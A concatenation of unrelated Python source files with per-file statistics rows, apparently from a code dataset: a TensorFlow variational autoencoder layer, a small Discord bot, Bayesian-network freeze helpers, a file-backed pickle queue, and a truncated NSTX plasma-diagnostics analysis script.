log_sigmas = x[:, self._n_vars:]
return means, log_sigmas
def sample(self, means, log_sigmas):
batch_size = tf.shape(means)[0]
samples = tf.random.normal(
shape=(batch_size, self._n_vars),
mean=0.0,
stddev=1.0,
)
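        # Reparameterization trick: z = mu + exp(0.5 * log_sigma) * eps with
        # eps ~ N(0, I); exp(0.5 * log_sigma) is the std, since log_sigma is
        # the log of the (diagonal) variance.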
samples = samples * tf.math.exp(0.5 * log_sigmas) + means
return samples
def decode(self, latent_vars, training=None):
decoded = self._decoder(latent_vars, training=training)
return decoded
def call(self, inputs, training=None):
# inputs: (B, n_feats)
# (B, n_vars), (B, n_vars)
means, log_sigmas = self.encode(inputs, training=training)
# (B, n_vars)
samples = self.sample(means, log_sigmas)
# (B, n_feats)
decoded = self.decode(samples, training=training)
return {
'mean': means,
'log_sigma': log_sigmas,
'samples': samples,
'decoded': decoded,
}
def predict(self, inputs):
pred = self(inputs, training=False)
pred['sigma'] = tf.math.exp(pred['log_sigma'])
pred['decoded'] = tf.nn.sigmoid(pred['decoded'])
return pred
def loss_fn(self, batch, prediction, step):
# TODO: make beta increase over time
if self._recons_type == 'ce':
recons_loss = losses.reconstruction_cross_entropy(
prediction=prediction['decoded'],
labels=batch,
is_logit=True,
)
elif self._recons_type == 'mse':
recons_loss = losses.reconstruction_mean_square_error(
prediction=prediction['decoded'],
labels=batch,
is_logit=True,
)
else:
raise ValueError()
if self._kl_type == 'close':
kl_loss = losses.KL(
mean=prediction['mean'],
log_sigma=prediction['log_sigma'],
)
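            # For diagonal Gaussians vs N(0, I) the closed form is
            # KL = -0.5 * sum(1 + log_sigma - mu^2 - exp(log_sigma))
            # (standard result; assumed to be what losses.KL implements).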
elif self._kl_type == 'mc':
kl_loss = losses.KL_monte_carlo(
prediction['sample'],
mean=prediction['mean'],
log_sigma=prediction['log_sigma'],
)
else:
raise ValueError()
if step >= self._kl_add_step:
loss = recons_loss + self._beta * kl_loss
else:
loss = recons_loss
return {
'loss': loss,
'recons_loss': recons_loss,
'kl': kl_loss,
}
def train_callback(self):
pass
def compete_fn(self, batch, prediction, training=None):
return self.loss_fn(
batch=batch,
prediction=prediction,
step=self._kl_add_step,
)['loss']
def code_from_encode(self, encode_output):
return encode_output[0]
def code_from_call(self, call_output):
return call_output['mean']
def summary(self, writer, batch, step, training=None):
if self._summary_image_shape is None:
return
recons = self.call(batch, training=training)['decoded']
if self._output_is_logit:
recons = tf.nn.sigmoid(recons)
input_imgs = tf.reshape(
batch, [-1] + self._summary_image_shape
)
recon_imgs = tf.reshape(
recons, [-1] + self._summary_image_shape
)
if self._summary_image_shape[-1] >= 5:
# can't plot images with more than 4 channels
# plot the first 3 channels
input_imgs = input_imgs[..., :3]
recon_imgs = recon_imgs[..., :3]
with writer.as_default():
tf.summary.image(
"input{}".format(self._name), input_imgs, step=step
)
tf.summary.image(
"recons{}".format(self._name), recon_imgs, step=step
)
class ConvVAELayer(tf.keras.layers.Layer):
"""Convolutional Variational Autoencoder layer.
    The input is first passed through a CNN, whose output shape is
`encoder_cnn_output_shape`. The tensor is then flattened and passed
into a Dense layer with `n_vars` units.
Parameters
----------
input_shape: [int, int, int]
[H, W, C] of the input
n_vars : int
Number of latent variables.
When `use_dense` is True, the top MLP has `n_vars` * 2 nodes.
When `use_dense` is False, the last conv layer has
`n_vars` * 2 channels.
encoder_configs : [cnn.LayerConfig]
The configs of the convolutional layers. Does not include the
last layer where the network predicts the mean and variance.
decoder_configs : [cnn.LayerConfig]
        The configs of the decoder layers. Does not include the last
        layer where the network reconstructs the inputs.
encoder_cnn_output_shape : [int, int, int]
[H, W, C] of the encoder output. Only used when `use_dense` is
True.
use_dense : bool
        Whether to add a dense layer after the conv layers. Defaults to
        True. Note that if this is set to False, the last encoder conv
        layer has to output `n_vars * 2` channels in total.
reconstruction_type : str
        'ce' for cross entropy, or 'mse' for mean squared error
    kl_type : str
        'close' for closed-form calculation, 'mc' for Monte Carlo
beta : float
The weight on the KL term
kl_add_step : int
        The training step at which the KL loss is added
"""
def __init__(
self,
input_shape,
n_vars,
encoder_configs,
decoder_configs,
encoder_cnn_output_shape,
use_dense=True,
reconstruction_type='ce',
kl_type='close',
beta=1.0,
kl_add_step=0,
):
super(ConvVAELayer, self).__init__()
self._n_vars = n_vars
self._enc_configs = encoder_configs
self._dec_configs = decoder_configs
self._enc_output_shape = encoder_cnn_output_shape
self._use_dense = use_dense
self._enc_cnn = cnn.ConvNet(encoder_configs)
self._dec_cnn = cnn.ConvNet(decoder_configs)
if self._use_dense:
self._enc_mlp = mlp.MLP(
filters=[n_vars * 2],
last_layer_act_fn='linear'
)
self._dec_mlp = mlp.MLP(
                filters=[np.prod(encoder_cnn_output_shape)]
)
self._recons_type = reconstruction_type
self._kl_type = kl_type
self._beta = beta
self._kl_add_step = kl_add_step
def encode(self, inputs, training=None):
"""Encodes.
Parameters
----------
inputs : tf.Tensor, shape (B, H, W, C)
training : bool | None
Returns
-------
means : tf.Tensor
If `use_dense` is True, shape (B, n_vars).
Otherwise, shape (B, H', W', n_vars)
log_sigmas : tf.Tensor
Same shape as `means`
"""
x = self._enc_cnn(inputs, training=training)
if self._use_dense:
batch_size = tf.shape(x)[0]
x = tf.reshape(x, (batch_size, -1)) # (B, H'*W'*C')
x = self._enc_mlp(x, training=training)
        # (B, H', W', n_vars) or (B, n_vars)
        means = x[..., :self._n_vars]
        # (B, H', W', n_vars) or (B, n_vars)
        log_sigmas = x[..., self._n_vars:]
return means, log_sigmas
def decode(self, latent_vars, training=None):
"""Decodes.
Parameters
----------
latent_vars : tf.Tensor
If `use_dense` is True, shape (B, n_vars)
Otherwise, shape (B, H', W', n_vars)
training : bool | None
Returns
-------
decoded : tf.Tensor, shape (B, H, W, C)
"""
x = latent_vars
if self._use_dense:
batch_size = tf.shape(x)[0]
x = self._dec_mlp(x, training=training)
x = tf.reshape(x, [batch_size] + self._enc_output_shape)
decoded = self._dec_cnn(x, training=training)
return decoded
def sample(self, means, log_sigmas):
samples = tf.random.normal(
shape=tf.shape(means),
mean=0.0,
stddev=1.0,
)
samples = samples * tf.math.exp(0.5 * log_sigmas) + means
return samples
def call(self, inputs, training=None):
"""Runs the network
Parameters
----------
inputs : tf.Tensor, shape (B, H, W, C)
Returns
-------
outputs : dict
'mean' : tf.Tensor
If `use_dense` is True, shape (B, n_vars)
Otherwise, shape (B, H', W', n_vars)
            'log_sigma' : tf.Tensor, same shape as 'mean'
            'sample' : tf.Tensor, same shape as 'mean'
'decoded' : tf.Tensor, shape (B, H, W, C)
"""
means, log_sigmas = self.encode(inputs, training=training)
samples = self.sample(means, log_sigmas)
decoded = self.decode(samples, training=training)
return {
'mean': means,
'log_sigma': log_sigmas,
'sample': samples,
'decoded': decoded,
}
def predict(self, inputs):
pred = self(inputs, training=False)
pred['sigma'] = tf.math.exp(pred['log_sigma'])
pred['decoded'] = tf.nn.sigmoid(pred['decoded'])
return pred
def loss_fn(self, batch, prediction, step):
# TODO: make beta increase over time
recons_loss = losses.reconstruction_loss(
loss_type=self._recons_type,
prediction=prediction['decoded'],
labels=batch,
is_logit=True,
)
mean_reshaped = tf.reshape(
prediction['mean'], (-1, self._n_vars)
)
log_sigma_reshaped = tf.reshape(
prediction['log_sigma'], (-1, self._n_vars)
)
sample_reshaped = tf.reshape(
prediction['sample'], (-1, self._n_vars)
)
if self._kl_type == 'close':
kl_loss = losses.KL(
mean=mean_reshaped,
log_sigma=log_sigma_reshaped,
)
elif self._kl_type == 'mc':
kl_loss = losses.KL_monte_carlo(
sample_reshaped,
mean=mean_reshaped,
log_sigma=log_sigma_reshaped,
)
else:
            raise ValueError('Unknown kl_type: {}'.format(self._kl_type))
        if not self._use_dense:
            # Without the dense head, 'mean' is (B, H', W', n_vars); average
            # the per-position KL over the spatial grid so it matches the
            # per-sample reconstruction loss.
            Hp = tf.shape(prediction['mean'])[1]
            Wp = tf.shape(prediction['mean'])[2]
            kl_loss = tf.reshape(kl_loss, (-1, Hp, Wp))
            kl_loss = tf.reduce_mean(kl_loss, axis=(1, 2))
if step >= self._kl_add_step:
loss = recons_loss + self._beta * kl_loss
else:
loss = recons_loss
return loss
def train_callback(self):
pass
def summary(self, writer, batch, step, training=None):
pred = self.call(batch, training=training)
recons = tf.nn.sigmoid(pred['decoded'])
with writer.as_default():
tf.summary.image("input", batch, step=step)
tf.summary.image("recons", recons, step=step)
@classmethod
def from_config(cls, config):
encoder_configs = [
cnn.LayerConfig(**layer_config)
for layer_config in config['encoder']
]
decoder_configs = [
cnn.LayerConfig(**layer_config)
for layer_config in config['decoder']
]
layer = cls(
encoder_configs=encoder_configs,
decoder_configs=decoder_configs,
**config['conv_vae_layer'],
)
return layer
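# Illustrative config layout for `ConvVAELayer.from_config` (the per-layer
# kwargs are assumptions about cnn.LayerConfig; only the top-level key names
# come from the code above):
#   config = {
#       'encoder': [{'filters': 32, 'kernel_size': 3}, ...],
#       'decoder': [{'filters': 32, 'kernel_size': 3}, ...],
#       'conv_vae_layer': {
#           'input_shape': [64, 64, 1],
#           'n_vars': 32,
#           'encoder_cnn_output_shape': [8, 8, 64],
#       },
#   }
#   layer = ConvVAELayer.from_config(config)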
| 31.473094 | 71 | 0.563368 | 1,695 | 14,037 | 4.434808 | 0.128614 | 0.023281 | 0.01317 | 0.00745 | 0.574165 | 0.523746 | 0.459891 | 0.426234 | 0.334974 | 0.306904 | 0 | 0.004703 | 0.333476 | 14,037 | 445 | 72 | 31.54382 | 0.798739 | 0.243143 | 0 | 0.476703 | 0 | 0 | 0.033092 | 0 | 0 | 0 | 0 | 0.004494 | 0 | 1 | 0.078853 | false | 0.007168 | 0.014337 | 0.010753 | 0.16129 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fd08595273898979a4350401388133ed3dd3b1 | 245 | py | Python | main.py | DepressedGiraffe/simple-python-script | da506de8b7c64a1e04e05714fbbace4c757a46de | [
"MIT"
] | null | null | null | main.py | DepressedGiraffe/simple-python-script | da506de8b7c64a1e04e05714fbbace4c757a46de | [
"MIT"
] | null | null | null | main.py | DepressedGiraffe/simple-python-script | da506de8b7c64a1e04e05714fbbace4c757a46de | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
bot = commands.Bot(command_prefix="brexit ")
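# Note: with discord.py 2.x the Bot constructor also requires gateway
# intents, and prefix commands need the message content intent:
#   intents = discord.Intents.default()
#   intents.message_content = True
#   bot = commands.Bot(command_prefix="brexit ", intents=intents)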
@bot.event
async def on_ready():
print("brexit bot ready")
@bot.command()
async def brexit(ctx):
await ctx.send("I agree")
bot.run("token")
| 16.333333 | 44 | 0.710204 | 37 | 245 | 4.648649 | 0.594595 | 0.127907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15102 | 245 | 14 | 45 | 17.5 | 0.826923 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fd58f8ef0e6453a57b977a3dc3de1317f3bc00 | 726 | py | Python | torchbnn/utils/freeze_model.py | anaplasia29/Bayesian-Neural-Network | d98df8039e52cd2505dc8a94ed3cd474c2056d9a | [
"MIT"
] | null | null | null | torchbnn/utils/freeze_model.py | anaplasia29/Bayesian-Neural-Network | d98df8039e52cd2505dc8a94ed3cd474c2056d9a | [
"MIT"
] | null | null | null | torchbnn/utils/freeze_model.py | anaplasia29/Bayesian-Neural-Network | d98df8039e52cd2505dc8a94ed3cd474c2056d9a | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
from ..modules import *
bayes_layer = (BayesLinear, BayesConv2d, BayesBatchNorm2d)
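# Usage sketch for the freeze/unfreeze helpers defined below
# (BayesLinear(prior_mu, prior_sigma, in_features, out_features) follows
# torchbnn's layer signature; treat the numbers as illustrative):
#   model = nn.Sequential(BayesLinear(0.0, 0.1, 10, 5))
#   freeze(model)    # Bayesian layers switch to deterministic (mean) weights
#   unfreeze(model)  # restore stochastic weight sampling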
def freeze(module):
"""
    Method for freezing a Bayesian model.
    Arguments:
        module (nn.Module): the module to be frozen.
    """
    if isinstance(module, bayes_layer):
        module.freeze()
    for submodule in module.children():
freeze(submodule)
def unfreeze(module):
"""
    Method for unfreezing a Bayesian model.
    Arguments:
        module (nn.Module): the module to be unfrozen.
    """
    if isinstance(module, bayes_layer):
        module.unfreeze()
    for submodule in module.children():
unfreeze(submodule) | 22 | 61 | 0.608815 | 77 | 726 | 5.701299 | 0.415584 | 0.068337 | 0.072893 | 0.123007 | 0.487472 | 0.359909 | 0.205011 | 0.205011 | 0.205011 | 0.205011 | 0 | 0.003914 | 0.296143 | 726 | 33 | 62 | 22 | 0.855186 | 0.26584 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
b2fe3d920d315602760741701f4929555bcf00ba | 7,072 | py | Python | FileQueue.py | ZMcursor/pythonFileQueue | b6e042295cc00ef952adc5fdaa2143238bd44794 | [
"Apache-2.0"
] | null | null | null | FileQueue.py | ZMcursor/pythonFileQueue | b6e042295cc00ef952adc5fdaa2143238bd44794 | [
"Apache-2.0"
] | null | null | null | FileQueue.py | ZMcursor/pythonFileQueue | b6e042295cc00ef952adc5fdaa2143238bd44794 | [
"Apache-2.0"
] | null | null | null | """A multi-producer, multi-consumer queue based on file system"""
import os
import tempfile
import threading
from collections import deque
from time import time as _time
try:
import cPickle as _pickle
except ImportError:
import pickle as _pickle
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty
__all__ = ["Empty", "FileQueue"]
class FileQueue(object):
""" Create a queue object with the given 'buffer_dir' and 'buffer_size'.
When the size of queue is reach the 'buffer_size',then the queue
will be pickled to a file under the 'buffer_dir'.
    'buffer_dir' will be created if necessary; if 'buffer_dir' is not
    given, the temporary directory will be used.
"""
def __init__(self, buffer_dir=None, buffer_size=100000, save_data=False):
if buffer_dir:
self.__buffer_dir = buffer_dir
else:
self.__buffer_dir = os.path.join(
tempfile.gettempdir(), 'pyFileQueue')
self.__buffer_size = buffer_size
# whether to save data when closing
self.__save_data = save_data
        # create buffer_dir if necessary
if not os.path.exists(self.__buffer_dir):
os.makedirs(self.__buffer_dir)
info_path = os.path.join(self.__buffer_dir, 'info')
if os.path.exists(info_path):
# load info
with open(info_path, 'rb') as f:
self.__size, self.__files = _pickle.load(f)
else:
self.__size = 0
self.__files = deque()
# queue to put item
self.__queue_in = deque()
# queue to get item
self.__queue_out = deque()
self.__mutex = threading.Lock()
self.__not_empty = threading.Condition(self.__mutex)
def put(self, item):
"""Put an item into the queue.
        The queue will be pickled to a file if its size reaches the buffer_size.
"""
self.__mutex.acquire()
try:
self.__queue_in.append(item)
if len(self.__queue_in) >= self.__buffer_size:
if not self.__files and not self.__queue_out:
self.__queue_in, self.__queue_out = self.__queue_out, self.__queue_in
else:
self.__save_to_file(self.__queue_in)
self.__queue_in = deque()
self.__size += 1
self.__not_empty.notify()
finally:
self.__mutex.release()
def get(self, block=True, timeout=0):
"""Remove and return an item from the queue.
        If optional arg 'block' is true, block if necessary until an item
is available. If 'timeout' is greater than 0, it blocks at most
'timeout' seconds and raises the Empty exception if no item was
available within that time.
Otherwise ('block' is false), return an item if one is immediately
available, else raise the Empty exception ('timeout' is ignored
in that case).
"""
self.__not_empty.acquire()
try:
if not self.__queue_out:
if self.__files:
self.__queue_out = self.__get_from_file(
self.__files.popleft())
elif self.__queue_in:
self.__queue_in, self.__queue_out = self.__queue_out, self.__queue_in
else:
if block:
if timeout > 0:
end = _time() + timeout
while not self.__queue_in:
remaining = end - _time()
if remaining <= 0.0:
raise Empty
self.__not_empty.wait(remaining)
else:
while not self.__queue_in:
self.__not_empty.wait()
self.__queue_in, self.__queue_out = self.__queue_out, self.__queue_in
else:
raise Empty
self.__size -= 1
return self.__queue_out.popleft()
finally:
self.__not_empty.release()
def get_nowait(self):
"""Remove and return an item from the queue without blocking.
Only get an item if one is immediately available. Otherwise
raise the Empty exception.
"""
return self.get(block=False)
def size(self):
"""Return the approximate size of the queue (not reliable!)."""
return self.__size
@property
def buffer_dir(self):
"""Return the buffer directory."""
return self.__buffer_dir
@property
def buffer_size(self):
"""Return the buffer size."""
return self.__buffer_size
@property
def is_save_data(self):
"""Return if save data."""
return self.__save_data
def __save_to_file(self, queue, tail=True):
"""Pickled a queue to a file"""
file_name = str(int(_time() * 1000))
if tail:
self.__files.append(file_name)
else:
self.__files.appendleft(file_name)
with open(os.path.join(self.__buffer_dir, file_name), 'wb') as f:
_pickle.dump(queue, f, -1)
def __get_from_file(self, filename):
"""Load a queue from file"""
file_path = os.path.join(self.__buffer_dir, filename)
with open(file_path, 'rb') as f:
obj = _pickle.load(f)
os.remove(file_path)
return obj
def close(self):
"""Save data and remove useless file if naccesary.
if 'save_data' is True,queue will be saved.Otherwise the
buffer_dir will be remove.
"""
def rmdir(dir_path):
for item in os.listdir(dir_path):
path = os.path.join(dir_path, item)
if os.path.isdir(path):
rmdir(path)
else:
os.remove(path)
os.rmdir(dir_path)
if self.__save_data and self.__files is not None:
if self.__queue_in:
self.__save_to_file(self.__queue_in)
if self.__queue_out:
self.__save_to_file(self.__queue_out, False)
if self.__files:
with open(os.path.join(self.__buffer_dir, 'info'), 'wb') as f:
_pickle.dump((self.__size, self.__files), f, -1)
else:
rmdir(self.__buffer_dir)
else:
rmdir(self.__buffer_dir)
self.__queue_in = None
self.__queue_out = None
self.__files = None
def __len__(self):
return self.__size
def __repr__(self):
return 'FileQueue(localtion:%s, size:%d)' % (self.__buffer_dir, self.__size)
def __del__(self):
self.close()
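# Usage sketch:
#   q = FileQueue(buffer_size=3, save_data=True)
#   for i in range(10):
#       q.put(i)       # full in-memory deques spill as pickled files into buffer_dir
#   q.get()            # -> 0; FIFO order is preserved across spilled files
#   q.close()          # persists remaining items plus an 'info' index file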
| 35.36 | 94 | 0.548784 | 846 | 7,072 | 4.231678 | 0.189125 | 0.080447 | 0.052235 | 0.040223 | 0.193855 | 0.143296 | 0.127374 | 0.077654 | 0.041899 | 0.041899 | 0 | 0.004476 | 0.368213 | 7,072 | 199 | 95 | 35.537688 | 0.796777 | 0.204044 | 0 | 0.281481 | 0 | 0 | 0.014009 | 0.004414 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.081481 | 0.014815 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6501b22de85551754d2ad6fd9ef9fe788f4640b8 | 18,735 | py | Python | publications/generate_database_for_jim.py | fusion-flap/flap_nstx_gpi | cf7d4bdecea8fd7434f8f7eb64e1a7b13fc0f759 | [
"MIT"
] | null | null | null | publications/generate_database_for_jim.py | fusion-flap/flap_nstx_gpi | cf7d4bdecea8fd7434f8f7eb64e1a7b13fc0f759 | [
"MIT"
] | 1 | 2019-10-03T22:25:58.000Z | 2021-10-06T10:31:11.000Z | publications/generate_database_for_jim.py | fusion-flap/flap_nstx_gpi | cf7d4bdecea8fd7434f8f7eb64e1a7b13fc0f759 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sat Jul 25 17:48:40 2020
@author: mlampert
"""
import os
import copy
import csv
import pandas
import numpy as np
import pickle
import flap
import flap_nstx
from flap_nstx.analysis import calculate_nstx_gpi_frame_by_frame_velocity, calculate_nstx_gpi_smooth_velocity
from flap_nstx.analysis import flap_nstx_thomson_data, get_nstx_thomson_gradient, get_fit_nstx_thomson_profiles
thisdir = os.path.dirname(os.path.realpath(__file__))
fn = os.path.join(thisdir,'../flap_nstx.cfg')
flap.config.read(file_name=fn)
flap_nstx.register()
def generate_database_for_jim(elm_window=500e-6,
elm_duration=100e-6,
averaging='before_after', #The type of averaging for the _avg results ['before_after', 'full', 'elm']
gradient_type='max', #Type of the gradient calculation ['max', 'local', 'global']
scale_length=False, #Calculate the grad/abs instead of the gradient
recalc=False, #Recalculate the results and do not load from the pickle file
plot=False, #Plot the results with matplotlib
plot_error=False,
pdf=False, #Save the results into a PDF
thomson_time_window=2e-3, #Time window of the Thomson data compared to the ELM time
correlation_threshold=0.6,
spline_thomson=False, #Calculate the results from the spline fit Thomson data
auto_x_range=True,
auto_y_range=True,
pressure_grad_range=None, #Plot range for the pressure gradient
density_grad_range=None, #Plot range for the density gradient
temperature_grad_range=None, #Plot range for the temperature gradient (no outliers, no range)
thomson_frequency=60., #Frequency of the Thomson scattering in Hz
normalized_structure=True,
normalized_velocity=True,
subtraction_order=4,
plot_thomson_profiles=False,
plot_only_good=False, #Plot only those results, which satisfy the dependence_error_threshold condition.
dependence_error_threshold=0.5, #Line fitting error dependence relative error threshold. Results under this value are plotted into a text file.
inverse_fit=False,
plot_linear_fit=True,
test=False,
window_average=500e-6,
sampling_time=2.5e-6,
ahmed_database=True,
):
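    """Average GPI velocity/structure results in a window around each ELM and
    pair them with Thomson-scattering profile fit parameters (or the
    pre-fitted 'Ahmed' database) and EFIT magnetic-field values at the
    structure position. Returns the dict of ELM-synchronized averages."""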
nwin=int(window_average/sampling_time)
database_single={'n_e':0.,
'T_e':0.,
'B_tor':0.,
'B_pol':0.,
'B_rad':0.,}
notnan_db_single=copy.deepcopy(database_single)
average_results={'Velocity ccf':np.zeros([2*nwin,2]),
'Velocity str avg':np.zeros([2*nwin,2]),
'Velocity str max':np.zeros([2*nwin,2]),
'Size avg':np.zeros([2*nwin,2]),
'Size max':np.zeros([2*nwin,2]),
'Position avg':np.zeros([2*nwin,2]),
'Position max':np.zeros([2*nwin,2]),
'Centroid avg':np.zeros([2*nwin,2]),
'Centroid max':np.zeros([2*nwin,2]),
'COG avg':np.zeros([2*nwin,2]),
'COG max':np.zeros([2*nwin,2]),
'Area avg':np.zeros([2*nwin]),
'Area max':np.zeros([2*nwin]),
'Elongation avg':np.zeros([2*nwin]),
'Elongation max':np.zeros([2*nwin]),
'Angle avg':np.zeros([2*nwin]),
'Angle max':np.zeros([2*nwin]),
'Str number':np.zeros([2*nwin]),
}
notnan_counter=copy.deepcopy(average_results)
if gradient_type not in ['max', 'local', 'global']:
raise ValueError('Gradient_type should be one of the following: max, local, global')
#GPI spatial_coefficients
coeff_r=np.asarray([3.7183594,-0.77821046,1402.8097])/1000. #The coordinates are in meters, the coefficients are in mm
flap.delete_data_object('*')
wd=flap.config.get_all_section('Module NSTX_GPI')['Working directory']
if spline_thomson:
result_filename=wd+'/processed_data/'+'elm_profile_dependence_spline'
else:
result_filename=wd+'/processed_data/'+'elm_profile_dependence'
if scale_length:
result_filename+='_scale'
result_filename+='_'+gradient_type+'_grad'
result_filename+='_'+averaging+'_avg'
result_filename+='_'+str(thomson_time_window*1000)+'ms_both'
if normalized_structure:
result_filename+='_ns'
if normalized_velocity:
result_filename+='_nv'
result_filename+='_so'+str(subtraction_order)
#Load and process the ELM database
database_file='/Users/mlampert/work/NSTX_workspace/db/ELM_findings_mlampert_velocity_good.csv'
db=pandas.read_csv(database_file, index_col=0)
elm_index=list(db.index)
coeff_r=np.asarray([3.7183594,-0.77821046,1402.8097])/1000. #The coordinates are in meters, the coefficients are in mm
coeff_z=np.asarray([0.18090118,3.0657776,70.544312])/1000. #The coordinates are in meters, the coefficients are in mm
coeff_r_new=3./800.
coeff_z_new=3./800.
det=coeff_r[0]*coeff_z[1]-coeff_z[0]*coeff_r[1]
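    # det inverts the 2x2 pixel->mm calibration matrix; it is reused below to
    # rotate per-frame (row, column) results into radial/poloidal components.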
elm_number=0.
if ahmed_database:
db_ahmed=[]
with open('/Users/mlampert/work/NSTX_workspace/WORK_MATE/Profile_fitsfur_Mate') as tsvfile:
reader = csv.reader(tsvfile, delimiter='\t')
for row in reader:
line=[]
for data in row:
try:
line.append(float(data.strip(' ')))
except:
pass
db_ahmed.append(line)
db_ahmed=np.asarray(db_ahmed).transpose()
db_dict={'shot':db_ahmed[0,:],
'time1':db_ahmed[1,:],
'time2':db_ahmed[2,:],
'T_e_ped':db_ahmed[3,:],
'n_e_ped':db_ahmed[4,:],
'p_e_ped':db_ahmed[5,:],
'T_e_max_grad':db_ahmed[6,:],
'n_e_max_grad':db_ahmed[7,:],
'p_e_max_grad':db_ahmed[8,:],
'T_e_width':db_ahmed[9,:],
'n_e_width':db_ahmed[10,:],
'p_e_width':db_ahmed[11,:],
}
for index_elm in range(len(elm_index)):
elm_time=db.loc[elm_index[index_elm]]['ELM time']/1000.
shot=int(db.loc[elm_index[index_elm]]['Shot'])
if normalized_velocity:
if normalized_structure:
str_add='_ns'
else:
str_add=''
filename=flap_nstx.analysis.filename(exp_id=shot,
working_directory=wd+'/processed_data',
time_range=[elm_time-2e-3,elm_time+2e-3],
comment='ccf_velocity_pfit_o'+str(subtraction_order)+'_fst_0.0'+str_add+'_nv',
extension='pickle')
else:
filename=wd+'/processed_data/'+db.loc[elm_index[index_elm]]['Filename']+'.pickle'
#grad.slice_data(slicing=time_slicing)
status=db.loc[elm_index[index_elm]]['OK/NOT OK']
if status != 'NO':
velocity_results=pickle.load(open(filename, 'rb'))
det=coeff_r[0]*coeff_z[1]-coeff_z[0]*coeff_r[1]
for key in ['Velocity ccf','Velocity str max','Velocity str avg','Size max','Size avg']:
orig=copy.deepcopy(velocity_results[key])
velocity_results[key][:,0]=coeff_r_new/det*(coeff_z[1]*orig[:,0]-coeff_r[1]*orig[:,1])
velocity_results[key][:,1]=coeff_z_new/det*(-coeff_z[0]*orig[:,0]+coeff_r[0]*orig[:,1])
velocity_results['Velocity ccf'][np.where(velocity_results['Correlation max'] < correlation_threshold),:]=[np.nan,np.nan]
time=velocity_results['Time']
elm_time_interval_ind=np.where(np.logical_and(time >= elm_time-window_average,
time <= elm_time+window_average))
elm_time=(time[elm_time_interval_ind])[np.argmin(velocity_results['Frame similarity'][elm_time_interval_ind])]
elm_time_ind=np.argmin(np.abs(time-elm_time))
for key in average_results.keys():
if len(average_results[key].shape) == 1:
ind_nan=np.isnan(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin])
notnan_counter[key]+=np.logical_not(ind_nan)
(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin])[ind_nan]=0.
average_results[key]+=velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin]
else:
ind_nan_rad=np.isnan(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,0])
ind_nan_pol=np.isnan(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,1])
notnan_counter[key][:,0]+=np.logical_not(ind_nan_rad)
notnan_counter[key][:,1]+=np.logical_not(ind_nan_pol)
(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,0])[ind_nan_rad]=0.
(velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,1])[ind_nan_pol]=0.
average_results[key][:,0]+=velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,0]
average_results[key][:,1]+=velocity_results[key][elm_time_ind-nwin:elm_time_ind+nwin,1]
if not ahmed_database:
try:
n_e_param=get_fit_nstx_thomson_profiles(exp_id=shot, #Shot number
pressure=False, #Return the pressure profile paramenters
temperature=False, #Return the temperature profile parameters
density=True, #Return the density profile parameters
flux_coordinates=True, #Calculate the results in flux coordinates
flux_range=[0.5,1.4], #The normalaized flux coordinates range for returning the results
test=False,
output_name=None,
return_parameters=True,
plot_time=None,
pdf_object=None,
)
n_e_alltime=n_e_param['Value at max']
time_thomson=n_e_param['Time']
elm_ind=np.argmin(np.abs(time_thomson-elm_time))
n_e=n_e_alltime[elm_ind]
print('n_e', n_e)
if n_e != 0.:
database_single['n_e']+=n_e
notnan_db_single['n_e']+=1
except:
pass
try:
T_e_param=get_fit_nstx_thomson_profiles(exp_id=shot, #Shot number
pressure=False, #Return the pressure profile paramenters
temperature=True, #Return the temperature profile parameters
density=False, #Return the density profile parameters
flux_coordinates=True, #Calculate the results in flux coordinates
flux_range=[0.5,1.4], #The normalaized flux coordinates range for returning the results
test=False,
output_name=None,
return_parameters=True,
plot_time=None,
pdf_object=None,
)
T_e_alltime=T_e_param['Value at max']
time_thomson=T_e_param['Time']
elm_ind=np.argmin(np.abs(time_thomson-elm_time))
T_e=T_e_alltime[elm_ind]
# print('T_e',T_e)
if T_e != 0 and T_e < 2.:
database_single['T_e']+=T_e
notnan_db_single['T_e']+=1
except:
pass
else:
db_ind=np.where(np.logical_and(db_dict['shot'] == shot, np.logical_and(db_dict['time1'] < elm_time*1e3, db_dict['time2'] > elm_time*1e3)))
